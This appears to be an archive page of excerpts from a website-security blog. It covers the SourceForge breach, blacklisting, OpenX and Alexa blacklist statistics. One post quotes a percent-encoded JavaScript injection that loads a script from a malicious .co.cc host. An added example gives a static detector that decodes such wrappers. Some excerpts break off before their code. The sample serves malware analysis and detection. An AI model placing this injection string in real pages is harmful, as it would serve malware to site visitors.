SourceForge.net servers compromised

If you have an account on SourceForge, or host any project there, we recommend that you change your password ASAP (especially if you re-use it somewhere else). Plus, if you host anything on their servers, make sure all of your files are clean and have not been modified.

The team at SourceForge posted that they have been hacked and that multiple servers were compromised: http://sourceforge.net/apps/wordpress/sourceforge/2011/01/27/sourceforge-net-attack-update/.

As we mentioned yesterday, we have discovered that sourceforge.net was attacked and several servers were compromised.

From one perspective a lot has changed since then: We understand more about what happened, and what we can do to prevent it from happening again.

From another perspective not much has changed: We’re doing the same things as we were last night: working to chart the full extent of the attack, to validate data against known good backups, and to protect the majority of our services.

CVS, ViewVC, file release uploads, and interactive shell services are still disabled while we do the work to make sure our servers and services are hardened against future attacks like this.



What to do when your site gets blacklisted

Most site owners only start to think about security when their site gets hacked (infected with malware) and blacklisted by Google.

So, here is what you need to do once you find out that your site is blacklisted:

*If you are registered with us already, don’t worry about it, just open a support request (we will take care of it).


Malware update: .co.cc malicious entries

For the last few weeks (actually months), we’ve been tracking a large amount of malware from .co.cc domains. It seems that every .co.cc domain we find is being used to host either malware or spam.

One of the techniques we are seeing used to spread malware is hiding the .co.cc domain, encoded, inside a JavaScript file. Something like this:

document.write(unescape("%3C%73%63%72%69%70%74%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%67%6F%6F%67%6C%65%2D%61%6E%61%6C%79%74%69%73%63%2E%63%6F%2E%63%63%2F%35%30%22%3E%3C%2F%73%63%72%69%70%74%3E"));

This malware is detected by our scanner as RKS5.
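
An added example (not part of the original post and not the Sucuri scanner's code): a static check that finds the document.write(unescape(...)) wrapper shown above, decodes the percent-encoded payload without executing it, and reports the host of any script it would load. The function names and the default `.co.cc` suffix list are assumptions made for this illustration.

```javascript
// Sample from the post above; the encoded payload is copied verbatim from the page.
const SAMPLE = 'document.write(unescape("%3C%73%63%72%69%70%74%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%67%6F%6F%67%6C%65%2D%61%6E%61%6C%79%74%69%73%63%2E%63%6F%2E%63%63%2F%35%30%22%3E%3C%2F%73%63%72%69%70%74%3E"));';
// Constructed benign input: a plain script include that must not be reported.
const CLEAN = '<script src="https://example.com/app.js"></script>';

// Matches document.write(unescape("...")) with either quote style. Case-insensitive,
// since injected code may vary capitalisation to dodge exact string matches.
const WRAPPER = /document\s*\.\s*write\s*\(\s*unescape\s*\(\s*(["'])([^"'\\]*)\1\s*\)\s*\)/gi;
const SCRIPT_SRC = /<script[^>]*\bsrc\s*=\s*["']?([^"'\s>]+)/gi;

// Percent-decode byte by byte, as the legacy unescape() does. The payload is
// only treated as text here; it is never evaluated.
function decodePercent(s) {
  return s.replace(/%([0-9a-f]{2})/gi, (_, hex) => String.fromCharCode(parseInt(hex, 16)));
}

// Return one finding per <script src> hidden inside an unescape() wrapper.
// suspiciousSuffixes is a hypothetical parameter: host suffixes to flag.
function findHiddenScripts(source, suspiciousSuffixes = ['.co.cc']) {
  const findings = [];
  for (const m of source.matchAll(WRAPPER)) {
    const decoded = decodePercent(m[2]);
    for (const s of decoded.matchAll(SCRIPT_SRC)) {
      let host = null;
      try {
        host = new URL(s[1]).hostname.toLowerCase();
      } catch (e) {
        // Relative or malformed src: keep the finding, leave host unset.
      }
      findings.push({
        offset: m.index,   // where the wrapper starts in the scanned file
        decoded,           // the markup the browser would have written
        src: s[1],
        host,
        suspicious: host !== null && suspiciousSuffixes.some((sfx) => host.endsWith(sfx)),
      });
    }
  }
  return findings;
}

console.log(JSON.stringify(findHiddenScripts(SAMPLE), null, 2));
```
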

Another interesting thing about this malware is that it is only displayed to users running Windows and Internet Explorer, since it has the following check:


Weekly malware update – 2010/Jan/14

Weekly malware update. You can track all updates by following our malware_updates category.

    *If your site has been affected by any of these issues, or if you want to share some information with us, contact us at support@sucuri.net or visit http://sucuri.net to get help.

Astro (JS:431) – osCommerce attacks

For the last few weeks, this attack has been the most common, especially targeting osCommerce sites. The following code is added to the bottom of the infected pages:


OpenX.org serving malware?

We are tracking a few sites that are currently blacklisted and showing a warning from Google that openx.org (home of a popular open source ad server) is the site responsible for the infection:

2 domain(s) appear to be functioning as intermediaries for distributing malware to visitors of this site, including openx.org/.

By looking at the diagnostic page for openx.org itself, it shows:

Has this site acted as an intermediary resulting in further distribution of malware?

Over the past 90 days, openx.org appeared to function as an intermediary for the infection of 82 site(s) including solovenezolanas.com/, thelocal.de/, drtuber.com/.

We are still tracking to see which ads are causing the issue, or if the openx servers themselves are compromised. If you include the tracking code from openx.org, we recommend that you check whether any malicious code is being pushed to your users.

Alexa top sites – Blacklist for December/2010

Every month we analyze Alexa’s TOP 1 million site ranking and correlate that data with Google’s blacklist. Our goal is to get an overall view of the sites that are getting hacked, blacklisted, etc.

For Dec-2010, the number is pretty standard, but a little bit lower than in previous months. Out of those top 1 million sites, around 2100 had their main domain blacklisted (2,099 to be more exact), a bit lower than the roughly 2500 in November and 3k in October. Out of the top 100k, more than 257 were blacklisted by Google.

Over time, only 636 sites that were blacklisted in previous months remain blacklisted, and in the TOP 1 million ranking.

Here are the top 100 sites that were flagged and their respective ranking (You can get the full list here):


Weekly malware update – 2010/Jan/07

Weekly malware update. You can track all updates by following our malware_updates category.

    *If your site has been affected by any of these issues, or if you want to share some information with us, contact us at support@sucuri.net or visit http://sucuri.net to get help.

